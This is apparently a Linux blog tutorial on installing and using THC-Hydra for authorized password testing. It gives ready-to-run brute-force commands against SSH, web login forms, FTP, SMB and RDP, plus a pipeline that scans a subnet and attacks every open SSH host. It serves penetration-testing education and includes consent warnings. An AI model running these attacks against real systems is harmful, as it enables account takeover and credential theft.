thelinuxvault blog

How to Install and Use Hydra in Linux: A Comprehensive Guide

Hydra (officially THC-Hydra) is one of the most powerful, open-source password-cracking tools used by ethical hackers and penetration testers. It specializes in dictionary attacks and brute-force attacks against a wide range of network services—from SSH and FTP to web forms and RDP. While Hydra is often associated with "hacking," its legitimate use lies in testing the security of systems by identifying weak passwords (with explicit permission from the system owner).

This guide will walk you through:

  • Installing Hydra on major Linux distributions.
  • Understanding its core syntax and flags.
  • Running practical attacks (e.g., SSH, web forms).
  • Best practices for ethical and efficient use.
  • Troubleshooting common issues.

By the end, you’ll be able to use Hydra responsibly to assess the security of your own systems (or those you’re authorized to test).

2026-05

Table of Contents#

  1. What is Hydra?
    • Brute-Force vs. Dictionary Attacks
    • Legitimate Use Cases
  2. Pre-Installation Prerequisites
  3. Installing Hydra on Linux
    • Debian/Ubuntu
    • RHEL/CentOS/Fedora
    • Arch Linux
    • Compiling from Source
  4. Hydra’s Core Syntax and Flags
  5. Common Usage Examples
    • Example 1: Brute-Force SSH
    • Example 2: Brute-Force HTTP POST Forms
    • Example 3: Brute-Force FTP
    • Example 4: Brute-Force SMB (Windows File Sharing)
    • Example 5: Brute-Force RDP
  6. Best Practices for Hydra
  7. Troubleshooting Common Issues
  8. Advanced Hydra Techniques
  9. Ethical and Legal Considerations
  10. Conclusion
  11. References

What is Hydra?#

Hydra is a parallelized login cracker developed by the THC (The Hacker’s Choice) team. It supports over 50 protocols, including:

  • SSH, FTP, Telnet
  • HTTP/HTTPS (form-based, Basic Auth)
  • SMB, RDP, VNC
  • MySQL, PostgreSQL, MongoDB

Brute-Force vs. Dictionary Attacks#

Hydra excels at dictionary attacks (using precompiled lists of common passwords like rockyou.txt), but it can also perform brute-force attacks (trying every possible combination of characters—though this is slower and rarely practical).

Attack TypeHow It WorksUse Case
DictionaryTests passwords from a list (e.g., 123456, password).Most common—targets weak, reused passwords.
Brute-ForceGenerates every possible password (e.g., a, b, ..., zzz).Rare—only for short passwords (≤6 characters).

Legitimate Use Cases#

  • Penetration Testing: Verify if users are using weak passwords.
  • Security Audits: Test if systems enforce strong authentication policies.
  • Incident Response: Validate if credentials leaked in a breach are still active.

Pre-Installation Prerequisites#

Before installing Hydra:

  1. Obtain Written Consent: Unauthorized use of Hydra (or any hacking tool) is illegal in most countries. You must have explicit permission from the system owner.
  2. Use a Testing Environment: Never test Hydra on production systems—use a virtual machine (e.g., VirtualBox) or a dedicated lab.
  3. Update Your System: Ensure your Linux distro is up to date to avoid dependency issues.

Installing Hydra on Linux#

Hydra is available in most Linux package managers. Below are instructions for popular distributions:

1. Debian/Ubuntu-Based Distros (Kali, Mint, Pop!_OS)#

Kali Linux comes with Hydra pre-installed. For other Debian/Ubuntu systems:

sudo apt update
sudo apt install hydra

2. RHEL/CentOS/Fedora#

First, enable the EPEL (Extra Packages for Enterprise Linux) repository:

# RHEL/CentOS 8+
sudo dnf install epel-release
sudo dnf install hydra
 
# RHEL/CentOS 7
sudo yum install epel-release
sudo yum install hydra

3. Arch Linux/Manjaro#

Use pacman to install Hydra:

sudo pacman -S hydra

4. Compiling from Source (For Older Distros)#

If your distro doesn’t have Hydra in its repos, compile it from the official GitHub repo:

Step 1: Install Dependencies#

# Debian/Ubuntu
sudo apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncurses5-dev libgcrypt20-dev libgnutls28-dev
 
# RHEL/CentOS
sudo yum install openssl-devel libssh-devel libidn-devel pcre-devel gtk2-devel mysql-devel postgresql-devel subversion-devel firebird-devel ncurses-devel libgcrypt-devel gnutls-devel

Step 2: Download and Compile#

git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install

Step 3: Verify Installation#

Run hydra -h to confirm Hydra is installed. You should see a help menu.

Hydra’s Core Syntax and Flags#

Hydra’s command structure is:

hydra [GLOBAL OPTIONS] [TARGET] [SERVICE-SPECIFIC OPTIONS]

Common Global Flags#

Use these flags to control Hydra’s behavior:

FlagPurpose
-l <user>Test a single username (e.g., -l admin).
-L <file>Test a list of usernames (e.g., -L users.txt).
-p <pass>Test a single password (e.g., -p password123).
-P <file>Test a list of passwords (e.g., -P rockyou.txt).
-t <num>Number of parallel threads (default: 16). Start with 5–10 to avoid overwhelming the target.
-s <port>Use a custom port (e.g., -s 2222 for SSH on port 2222).
-o <file>Save results to a file (e.g., -o results.txt).
-VVerbose mode (shows each login attempt).
-fStop after the first successful login (saves time).
-w <sec>Timeout for each connection (default: 3 seconds; e.g., -w 5 for slow targets).
-UShow usage for a specific service (e.g., hydra -U ssh).

Service-Specific Options#

Each service (e.g., ssh, http-post-form) has unique options. Use -U to learn more:

hydra -U http-post-form

Common Hydra Usage Examples#

Let’s walk through practical examples for popular services. We’ll use the rockyou.txt password list (pre-installed on Kali Linux: /usr/share/wordlists/rockyou.txt.gz). To unzip it:

gunzip /usr/share/wordlists/rockyou.txt.gz

Example 1: Brute-Force SSH#

SSH is the most common target for Hydra. Let’s test if the user john has a weak password:

hydra -l john -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ssh -V -t 10 -f

Breakdown:#

  • -l john: Test the username john.
  • -P rockyou.txt: Use the rockyou.txt password list.
  • 192.168.1.10: Target IP (replace with your lab VM’s IP).
  • ssh: Service to attack.
  • -V: Verbose output (see each attempt).
  • -t 10: Use 10 threads (balance speed and system load).
  • -f: Stop after the first successful login.

Expected Output:#

If a password is found:

[22][ssh] host: 192.168.1.10   login: john   password: iloveyou
1 of 1 target successfully completed, 1 valid password found

Example 2: Brute-Force HTTP POST Login Forms#

Web forms are trickier—you need to capture the form data and error message from the login page. Let’s attack a test site (http://192.168.1.10/login.php):

Step 1: Capture Form Data#

  1. Open the login page in Chrome/Firefox.
  2. Press F12 to open DevTools.
  3. Go to the Network tab.
  4. Submit the form with a wrong username/password (e.g., admin/wrong).
  5. Click the POST request (e.g., login.php).
  6. Copy the Form Data (e.g., username=admin&password=wrong).
  7. Copy the error message (e.g., Invalid credentials).

Step 2: Run Hydra#

Use the http-post-form module:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials" -V -t 5 -f

Breakdown:#

  • /login.php: The URL where the form submits data (action URL).
  • username=^USER^&password=^PASS^: Replace ^USER^/^PASS^ with Hydra’s placeholders for username/password.
  • Invalid credentials: The error message Hydra uses to detect failed logins.

Example 3: Brute-Force FTP#

FTP is unencrypted—use this example to test if an FTP server has weak credentials:

hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ftp -V -t 5

Example 4: Brute-Force SMB (Windows File Sharing)#

SMB is used for Windows file sharing. Test the administrator account:

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.10 smb -V -t 3

Note:#

Windows systems often have account lockout policies (e.g., 5 failed attempts = lockout). Use -t 3 (fewer threads) to avoid locking accounts.

Example 5: Brute-Force RDP (Remote Desktop)#

RDP is used for Windows remote access. Test the admin user:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 rdp -V -t 1

Note:#

RDP is slow—use -t 1 (1 thread) to avoid timeouts.

Best Practices for Hydra#

  1. Start Small: Use a small password list (e.g., 100 passwords) to test your command before running a full attack.
  2. Check Account Lockout Policies: Ask the system owner if the target has lockout rules (e.g., 5 failed attempts = lockout).
  3. Use Custom Password Lists: Combine rockyou.txt with organization-specific terms (e.g., company name, product names) for better results.
  4. Avoid Overloading Targets: Use -t 5–10 threads—too many threads can crash the target (DoS).
  5. Log Everything: Use -o results.txt to document findings for your report.
  6. Update Hydra Regularly: New versions fix bugs and add support for more services.

Troubleshooting Common Issues#

1. Connection Failures (Could not connect to target)#

  • Cause: Target is offline, firewall blocks the port, or service is not running.
  • Fix:
    • Ping the target: ping 192.168.1.10.
    • Check if the service is running: ss -tuln | grep 22 (for SSH).
    • Disable the target’s firewall (lab only): sudo ufw disable (Debian/Ubuntu) or sudo systemctl stop firewalld (RHEL/CentOS).

2. Authentication Errors (No valid passwords found)#

  • Cause: Password list is too small, username is incorrect, or target uses multi-factor authentication (MFA).
  • Fix:
    • Verify the username (e.g., john vs. John).
    • Use a larger password list (e.g., SecLists).
    • Check if MFA is enabled (Hydra can’t bypass MFA).

3. Slow Performance#

  • Cause: Too many threads, slow target, or network congestion.
  • Fix:
    • Reduce threads (e.g., -t 5 instead of -t 20).
    • Increase timeout (e.g., -w 5).

4. Module Not Found (No module for service 'rdp')#

  • Cause: Missing dependencies for the RDP module.
  • Fix: Install libfreerdp-dev (Debian/Ubuntu): 
    sudo apt install libfreerdp-dev

Advanced Hydra Techniques#

1. Integrate with Nmap (Find Open Ports)#

Use Nmap to scan for open SSH ports, then pipe results to Hydra:

nmap -p 22 192.168.1.0/24 -oG - | grep open | awk '{print $2}' | xargs -I {} hydra -l john -P /usr/share/wordlists/rockyou.txt {} ssh -V -t 5

Breakdown:#

  • nmap -p 22 192.168.1.0/24: Scan the subnet for open SSH ports (port 22).
  • -oG -: Output results in "greppable" format.
  • grep open: Filter for hosts with open SSH ports.
  • awk '{print $2}': Extract the IP address from each line.
  • xargs hydra: Pass the IPs to Hydra for brute-forcing.

2. Use Password Rules (John the Ripper)#

John the Ripper can generate mutated password lists that you can then feed to Hydra. First, create a rules.txt file:

# Append a number (1-9)
$[0-9]
# Capitalize first letter
c

Generate a mutated password list using John:

john --wordlist=/usr/share/wordlists/rockyou.txt --rules=rules.txt --stdout > mutated_passwords.txt

Then use the generated list with Hydra:

hydra -l admin -P mutated_passwords.txt 192.168.1.10 ssh -V

3. Brute-Force Multiple Users and Passwords#

Test a list of users (users.txt) with a list of passwords (pass.txt):

hydra -L users.txt -P pass.txt 192.168.1.10 ssh -V -t 5

Hydra is a double-edged sword—it can secure systems or be used for cybercrime. Here’s what you must know:

  1. Laws: Unauthorized access violates:
    • CFAA (U.S.): Computer Fraud and Abuse Act.
    • GDPR (EU): Requires consent for data processing.
    • Cybercrime Act (Global): Most countries have laws against hacking.
  2. Consequences: Penalties include fines, jail time, and a permanent criminal record.
  3. Ethical Hacking Certifications: Get certified (e.g., OSCP, CEH) to prove your skills and credibility.
  4. Report Findings: If you find weak passwords, report them to the system owner immediately.

Conclusion#

Hydra is an essential tool for ethical hackers—but it must be used responsibly. This guide covered:

  • Installing Hydra on Linux.
  • Understanding its core syntax.
  • Running practical attacks (SSH, web forms, RDP).
  • Best practices and troubleshooting.
  • Ethical/legal rules.

Remember: With great power comes great responsibility. Always prioritize consent and security.

References#

  1. Hydra Official Repo: https://github.com/vanhauser-thc/thc-hydra
  2. Kali Linux Hydra Docs: https://www.kali.org/tools/hydra/
  3. SecLists (Password Lists): https://github.com/danielmiessler/SecLists
  4. OSCP Certification: https://www.offensive-security.com/pwk-oscp/
  5. Legal Guidelines: https://www.isc2.org/Certifications/CISSP (CISSP Ethics)

Let me know if you have questions—happy hacking (ethically)! 🛡️